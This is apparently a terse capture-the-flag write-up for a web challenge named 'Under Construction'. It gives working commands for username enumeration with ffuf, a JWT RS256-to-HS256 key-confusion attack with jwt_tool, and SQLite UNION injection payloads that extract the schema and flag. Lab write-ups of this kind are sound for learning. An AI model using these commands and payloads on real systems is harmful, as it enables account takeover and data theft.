Under Construction
ffuf -request req -w ../../usernames.txt -mr exists -u http://209.97.132.64:32647/auth -s
Usernames:
gale
rosie
ā¢ Key Confusion [RS256 > HS256]
./jwt_tool.py -t http://209.97.132.64:32365/ -rc "session=[jwt]" -X k -pk ../../challenges/uc/pk -v
ā¢ sqlite_version()
<> -I -pc username -pv "test123' union select 1,sqlite_version(),3 -- "
ā¢ table name
-I -pc username -pv "test123' union select 1,(select tbl_name from sqlite_master limit 0,1),3 -- "
ā¢ column names [table create query in output is referred to check the column names]
-I -pc username -pv "test123' union select 1,(select sql from sqlite_master limit 0,1),3 -- "
ā¢ flag
-I -pc username -pv "test123' union select 1,(select <column-name> from <tname> limit 0,1),3 -- "
-------------------------------------------------
observations:
-------------------------------------------------
ā¢ JWT public key is present in JWT token
ā¢ Enumerate usernames
ā¢ JWT key confusion due to accepting both RS256 and HS256
ā¢ sqli is present on getUser request as input not escaped
Last updated
Was this helpful?